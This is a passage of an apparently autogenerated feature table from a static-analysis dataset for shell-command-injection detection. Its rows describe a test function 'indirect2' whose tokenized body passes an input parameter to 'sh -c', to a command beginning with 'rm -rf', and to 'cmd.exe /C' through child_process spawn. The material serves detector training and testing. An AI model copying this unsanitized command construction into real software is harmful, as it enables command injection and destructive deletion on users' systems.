Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:9 | cp.spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:9 | cp.spawn | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:9 | cp.spawn | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:9 | cp.spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | exceptional return of cp.spaw ... t' }\\n\\t) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | exceptional return of cp.spaw ... t' }\\n\\t) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | exceptional return of cp.spaw ... t' }\\n\\t) | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | exceptional return of cp.spaw ... t' }\\n\\t) | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | exceptional return of cp.spaw ... t' }\\n\\t) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:5:163:9 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:5:163:9 | spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:5:163:9 | spawn | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:5:163:9 | spawn | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:5:163:9 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:164:3:164:11 | 'cmd.exe' | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:164:3:164:11 | 'cmd.exe' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:164:3:164:11 | 'cmd.exe' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:164:3:164:11 | 'cmd.exe' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:164:3:164:11 | 'cmd.exe' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:164:3:164:11 | 'cmd.exe' | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:164:3:164:11 | 'cmd.exe' | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:164:3:164:11 | 'cmd.exe' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:164:3:164:11 | 'cmd.exe' | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:16 | ['/C', editor] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:16 | ['/C', editor] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:16 | ['/C', editor] | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:16 | ['/C', editor] | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:16 | ['/C', editor] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:23 | ['/C', ... .concat | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:23 | ['/C', ... .concat | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:23 | ['/C', ... .concat | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:23 | ['/C', ... .concat | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:23 | ['/C', ... .concat | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | exceptional return of ['/C', ... (args2) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | exceptional return of ['/C', ... (args2) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | exceptional return of ['/C', ... (args2) | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | exceptional return of ['/C', ... (args2) | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | exceptional return of ['/C', ... (args2) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:4:165:7 | '/C' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:10:165:15 | editor | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:18:165:23 | concat | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:18:165:23 | concat | 